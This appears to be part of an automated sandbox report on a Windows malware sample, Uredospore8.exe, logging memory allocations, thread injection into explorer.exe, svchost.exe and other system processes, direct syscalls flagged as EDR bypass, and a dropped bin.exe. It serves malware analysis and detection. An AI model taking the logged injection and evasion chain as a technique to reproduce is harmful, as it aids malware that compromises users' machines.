Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1320000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: DB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 7F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2500000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2100000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 12E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1480000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E60000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1420000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: ED0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 29A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2C30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2B80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: D30000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: E20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 6A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1370000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 23B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 810000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2980000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 1360000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 750000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: B80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 590000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 5F0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory allocated: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe base: 2140000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D0E45 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,	2_2_006D0E45
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D40E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,	3_2_00D40E21
Source: C:\Windows\explorer.exe	Code function: 4_2_00F81FD7 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,	4_2_00F81FD7
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_001C0E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,	19_2_001C0E21
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_001C0E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,	30_2_001C0E21
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 30_2_02140E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,	30_2_02140E21
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_001D0E21 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,	34_2_001D0E21
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 34_2_008B0E45 VirtualAllocEx,WriteProcessMemory,IsWow64Process,CreateRemoteThread,	34_2_008B0E45

Creates a thread in another existing process (thread injection)

Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\explorer.exe EIP: F808E2	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\sihost.exe EIP: D0094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F0094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 19094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\ctfmon.exe EIP: 9E094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\explorer.exe EIP: 2DF094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 84094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe EIP: EE094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: A4094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe EIP: BB094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 53094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 82094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\smartscreen.exe EIP: 25094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\ApplicationFrameHost.exe EIP: 93094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe EIP: 98094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 18094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\svchost.exe EIP: 67094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe EIP: 9C094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\conhost.exe EIP: F7094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\backgroundTaskHost.exe EIP: 71094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: D5094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 11A094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 234094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: D6094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: E1094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 214094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 73094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: B1094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 268094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 255094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe EIP: 213094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2BA094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2B2094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 11D094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: B8094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 137094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2ED094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 212094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 28D094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 22B094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 293094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 25B094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2D1094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 292094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 248094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 218094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2D6094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 14D094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 26B094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 138094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 284094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: B3094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 69094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 23B094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2F1094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 22B094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 221094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: C1094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: F9094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 62094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 86094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 7A094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 127094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 69094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: BD094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 5F094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 92094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 10C094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 98094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 200094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: A2094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 10F094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 13E094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 145094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: E9094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: CB094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: B6094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2B9094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 132094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: DB094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 7F094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 250094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 210094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 12E094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 148094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: E6094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 142094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: E9094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: ED094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 29A094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2C3094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 2B8094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: D3094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 11E094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: E2094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 6A094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 137094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 23B094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 81094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 298094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 136094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 75094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: B8094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 59094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: unknown EIP: 9D094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Windows\System32\dllhost.exe EIP: 5F094C	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Thread created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe EIP: 214094C	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe EIP: 1C094C	Jump to behavior
Source: C:\Windows\explorer.exe	Thread created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe EIP: 1C094C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Thread created: unknown EIP: 76228920	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Thread created: unknown EIP: 1D094C	Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtOpenSection: Direct from: 0x2143F49	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtQueryValueKey: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtDelayExecution: Direct from: 0x2144046	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtDelayExecution: Direct from: 0x2144036	Jump to behavior
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	NtDelayExecution: Direct from: 0x2144026	Jump to behavior

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\SysWOW64\winver.exe	Memory written: PID: 4004 base: F80000 value: 50			Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: PID: 4004 base: 2DF0000 value: 50			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Uredospore8.exe	Memory written: C:\Windows\SysWOW64\winver.exe base: FF18B0	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\explorer.exe base: F80000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\sihost.exe base: D00000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\svchost.exe base: F00000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\svchost.exe base: 190000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 9E0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\explorer.exe base: 2DF0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\svchost.exe base: 840000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: EE0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: A40000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: BB0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 530000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 820000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 250000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 930000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 980000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\svchost.exe base: 670000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: 9C0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\conhost.exe base: F70000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\backgroundTaskHost.exe base: 710000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: D50000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 11A0000	Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Memory written: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe base: 2340000	Jump to behavior
